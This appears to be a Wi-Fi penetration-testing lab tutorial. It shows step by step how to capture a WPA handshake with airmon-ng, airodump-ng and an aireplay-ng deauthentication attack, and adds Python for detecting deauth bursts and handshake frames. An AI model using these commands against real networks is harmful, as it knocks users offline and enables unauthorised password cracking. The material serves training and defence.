Introduction
The WPA/WPA2 four-way handshake is a critical component of modern Wi-Fi security. It's the process by which a client and an access point (AP) prove they know the pre-shared key (the Wi-Fi password) without ever transmitting it directly. Capturing this handshake is the first step in a brute-force or dictionary attack to recover the Wi-Fi password.
In this lab, you will learn how to use the powerful Aircrack-ng suite of tools to perform this capture. We will use airmon-ng to put your wireless card into monitor mode, airodump-ng to scan for and target a specific network, and aireplay-ng to force a client to re-authenticate, thereby generating a handshake for us to capture.
This lab simulates a real-world scenario. You will be provided with a wireless interface wlan0 and a target network to practice on within the lab environment.
Put the Wireless Adapter in Monitor Mode
In this step, we will prepare our wireless adapter for capturing network traffic. By default, a wireless adapter operates in "managed mode," meaning it only pays attention to traffic intended for it. To capture all Wi-Fi traffic in the air, we need to switch it to "monitor mode." We will use the airmon-ng tool for this.
First, let's check the name of our wireless interface. Open a terminal and run the iwconfig command.
iwconfig
You should see an interface listed, typically named wlan0.
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Now, use airmon-ng to start monitor mode on the wlan0 interface. This command will warn about network processes (such as wpa_supplicant and dhclient) that could interfere with the capture; they can be stopped with airmon-ng check kill.
sudo airmon-ng start wlan0
The output will confirm that monitor mode has been enabled. It usually creates a new virtual interface, often named wlan0mon, for monitoring.
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before bringing up the interface in monitor mode.
PID Name
591 wpa_supplicant
668 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Atheros Communications Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
You can verify that the new interface wlan0mon is in monitor mode by running iwconfig again.
iwconfig wlan0mon
The output should show Mode:Monitor.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
Run airodump-ng to Find the Target's BSSID and Channel
In this step, we will use airodump-ng to scan the airwaves and identify our target network. airodump-ng is a powerful tool for capturing 802.11 frames and discovering nearby access points and connected clients.
Now that our interface wlan0mon is in monitor mode, we can start the scan. Run the following command in your terminal:
sudo airodump-ng wlan0mon
Your terminal will fill with a list of all the Wi-Fi networks airodump-ng can detect. The display is split into two parts. The top part lists the Access Points (APs), and the bottom part lists connected clients (Stations).
Let's break down the key columns for the APs:
- BSSID: The MAC address of the Access Point. This is its unique hardware identifier.
- CH: The channel the network is operating on.
- ESSID: The human-readable name of the Wi-Fi network (e.g., "MyHomeWiFi").
Here is an example of what you might see:
CH 6 ][ Elapsed: 3 s ][ 2023-10-27 10:30
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -30 10 0 0 6 54e WPA2 CCMP PSK LabEx_WiFi
C8:D3:FF:A1:B2:C3 -65 8 0 0 1 54e WPA2 CCMP PSK AnotherWiFi
BSSID STATION PWR Rate Lost Frames Probe
For this lab, our target network is LabEx_WiFi. From the output above, identify its BSSID (00:11:22:33:44:55) and its CH (6). You will need these for the next step.
Once you have noted the BSSID and channel, press Ctrl+C in the terminal to stop the scanning process.
Run airodump-ng Targeting the Specific BSSID and Channel
In this step, we will focus our capture on the target network only. Running a general scan as we did in the previous step causes the wireless card to "channel hop," which means we could miss the handshake when it happens. To ensure a successful capture, we will tell airodump-ng to lock onto our target's channel and only listen for traffic from its BSSID.
We will also use the -w flag to write the captured packets to a file. This file is what will contain the handshake.
Use the BSSID and channel you identified in the previous step (00:11:22:33:44:55 and 6) to construct the following command. We will name our output file handshake_capture.
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w handshake_capture wlan0mon
After running this command, the airodump-ng display will change. It will now only show information for the LabEx_WiFi network. You will also see a list of any clients (STATIONs) connected to it.
CH 6 ][ Elapsed: 10 s ][ 2023-10-27 10:32 ][ WPA handshake: ...
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -32 100 25 10 1 6 54e WPA2 CCMP PSK LabEx_WiFi
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -40 1- 1 0 15
Important: Leave this terminal running. We need it to continue capturing. For the next step, you must open a new terminal window. You can do this by clicking the terminal icon in the environment's application dock again.
Use aireplay-ng to Deauthenticate a Client
In this step, we will actively force a handshake to occur. A handshake only happens when a client connects or reconnects to an access point. If a client is already connected, we can wait for them to disconnect naturally, but this could take a long time. A more proactive approach is to force them to disconnect using a "deauthentication attack."
We will use aireplay-ng to send specially crafted deauthentication packets to a client, making it believe it has been disconnected by the AP. The client will then automatically try to reconnect, generating the WPA handshake that our airodump-ng process (running in the other terminal) is waiting to capture.
Look at your first terminal window (the one running the targeted airodump-ng). Under the STATION column, you will see the MAC address of a connected client. For this lab, we will assume the client's MAC address is AA:BB:CC:DD:EE:FF.
Now, in your new terminal window, execute the following aireplay-ng command.
sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
- --deauth 5: This sends 5 deauthentication packets. A small burst is usually enough.
- -a 00:11:22:33:44:55: This is the BSSID of our target Access Point.
- -c AA:BB:CC:DD:EE:FF: This is the MAC address of the client we are targeting.
You will see output from aireplay-ng confirming that it is sending the packets.
10:35:10 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
10:35:11 Sending 64 directed DeAuths. STMAC: [AA:BB:CC:DD:EE:FF] [ 5|62 ACKs]
Now, let's check if our capture was successful.
Confirm Handshake Capture in the airodump-ng Window
In this final step, we will confirm that we have successfully captured the WPA handshake. The deauthentication attack we just performed should have caused the client to reconnect, and airodump-ng should have captured the resulting handshake.
Switch your focus back to your first terminal window, the one where airodump-ng has been running and targeting LabEx_WiFi.
Look at the top-right corner of the airodump-ng display. If the capture was successful, you will see a message that says [ WPA handshake: 00:11:22:33:44:55 ].
CH 6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 00:11:22:33:44:55
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -32 100 80 115 8 6 54e WPA2 CCMP PSK LabEx_WiFi
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -40 1-11 0 98
Seeing this message is your confirmation! You have successfully captured the four-way handshake.
You can now stop both processes by pressing Ctrl+C in each terminal window.
The captured data, including the handshake, has been saved to files in your current directory. You can list them with the ls -l command.
ls -l
You should see several files starting with handshake_capture, most importantly handshake_capture-01.cap.
-rw-r--r-- 1 root root 452 Oct 27 10:36 handshake_capture-01.cap
-rw-r--r-- 1 root root 1234 Oct 27 10:36 handshake_capture-01.csv
...
This .cap file is the prize. It contains the handshake and can now be used with tools like aircrack-ng or hashcat for offline password cracking attempts.
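A defender-side check on the resulting capture, added here as an example that is not part of the lab or of the Aircrack-ng suite: it reads an airodump-ng .cap file (a pcap of raw 802.11 frames), counts deauthentication frames per transmitter address (the burst generated in the deauthentication step is exactly what a wireless IDS alerts on), and classifies EAPOL-Key frames into handshake messages 1 to 4 from their Key Information bits, which is what the WPA handshake indicator summarises. The pcap it runs on is constructed inline for the lab's BSSID and client with zeroed nonces and MICs; sample_capture exists only to build that sample.

```python
import struct
from collections import Counter
LINKTYPE_IEEE802_11 = 105   # airodump-ng writes raw 802.11 frames with this pcap link type
KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0040, 0x0080, 0x0100, 0x0200   # EAPOL-Key Key Information bits
SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP header for EtherType 0x888E (EAPOL)
AP, STA = bytes.fromhex("001122334455"), bytes.fromhex("aabbccddeeff")   # the lab's BSSID and client

def frames(pcap_bytes):
    """Yield raw 802.11 frames from a little-endian pcap as written by airodump-ng."""
    magic, *_, linktype = struct.unpack("<IHHiIII", pcap_bytes[:24])
    if magic != 0xA1B2C3D4 or linktype != LINKTYPE_IEEE802_11:
        raise ValueError("expected a little-endian pcap of raw 802.11 frames")
    off = 24
    while off + 16 <= len(pcap_bytes):
        incl_len = struct.unpack("<I", pcap_bytes[off + 8:off + 12])[0]
        yield pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len

def deauth_counts(pcap_bytes):
    """Deauthentication frames (type 0, subtype 12) per transmitter address; a burst is the attack's signature."""
    return Counter(f[10:16].hex(":") for f in frames(pcap_bytes) if len(f) >= 16 and f[0] & 0xFC == 0xC0)

def classify_eapol_key(key_info):
    """Key Information bits -> message number: M1 ACK only, M2 MIC only, M3 ACK+MIC+Install, M4 MIC+Secure."""
    ack, mic = key_info & KI_ACK, key_info & KI_MIC
    if ack and not mic:
        return 1
    if mic and not ack:
        return 4 if key_info & KI_SECURE else 2
    return 3 if ack and mic and key_info & KI_INSTALL else None

def handshake_messages(pcap_bytes):
    """Return {(bssid, station): set of message numbers} for the EAPOL-Key frames in the capture."""
    seen = {}
    for f in (f for f in frames(pcap_bytes) if len(f) >= 24 and (f[0] >> 2) & 0x3 == 2):  # data frames only
        body = f[26 if f[0] & 0x80 else 24:]               # QoS data frames have a 2-byte QoS field
        bssid, sta = (f[4:10], f[10:16]) if f[1] & 0x01 else (f[10:16], f[4:10])   # ToDS set: addr1 is the BSSID
        if len(body) >= 15 and body[:8] == SNAP_EAPOL and body[9] == 3:            # EAPOL type 3 = EAPOL-Key
            if msg := classify_eapol_key(struct.unpack(">H", body[13:15])[0]):
                seen.setdefault((bssid.hex(":"), sta.hex(":")), set()).add(msg)
    return seen

def sample_capture():
    """Constructed pcap: five deauth frames carrying the AP's address as sender, then handshake M1..M4."""
    def eapol(key_info, to_ds):                            # minimal data frame carrying one EAPOL-Key
        addrs = AP + STA + AP if to_ds else STA + AP + AP  # addr1, addr2, addr3 for ToDS / FromDS
        key = b"\x02" + struct.pack(">H", key_info) + bytes(92)   # RSN descriptor; nonces, MIC etc. zeroed
        return bytes([0x08, 1 if to_ds else 2]) + bytes(2) + addrs + bytes(2) + SNAP_EAPOL + b"\x02\x03\x00\x5f" + key
    deauth = b"\xc0\x00" + bytes(2) + STA + AP + AP + bytes(2) + b"\x07\x00"   # reason code 7, as in a forced deauth
    fl = [deauth] * 5 + [eapol(0x008A, False), eapol(0x010A, True), eapol(0x13CA, False), eapol(0x030A, True)]
    return struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11) + b"".join(
        struct.pack("<IIII", 0, i, len(f), len(f)) + f for i, f in enumerate(fl))
```

Point handshake_messages at the bytes of handshake_capture-01.cap to get the same per-client summary airodump-ng shows; a real detector would additionally rate-limit deauth_counts over a time window, and 802.11w (Protected Management Frames) is the mitigation that makes the forged frames unacceptable to the client.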
Summary
Congratulations on completing this lab! You have successfully performed one of the fundamental techniques in Wi-Fi penetration testing.
In this lab, you learned how to:
- Put a wireless adapter into monitor mode using airmon-ng.
- Scan for nearby wireless networks to identify a target with airodump-ng.
- Focus airodump-ng on a specific BSSID and channel to prepare for a targeted capture, saving the results to a file.
- Use aireplay-ng to perform a deauthentication attack, forcing a client to reconnect.
- Confirm the capture of the WPA handshake in the airodump-ng output.
The .cap file you generated contains the valuable handshake data. The next logical step in a real engagement would be to use this file to attempt to crack the Wi-Fi password, a topic for another lab. You now have a solid understanding of the manual process for capturing this critical piece of data.
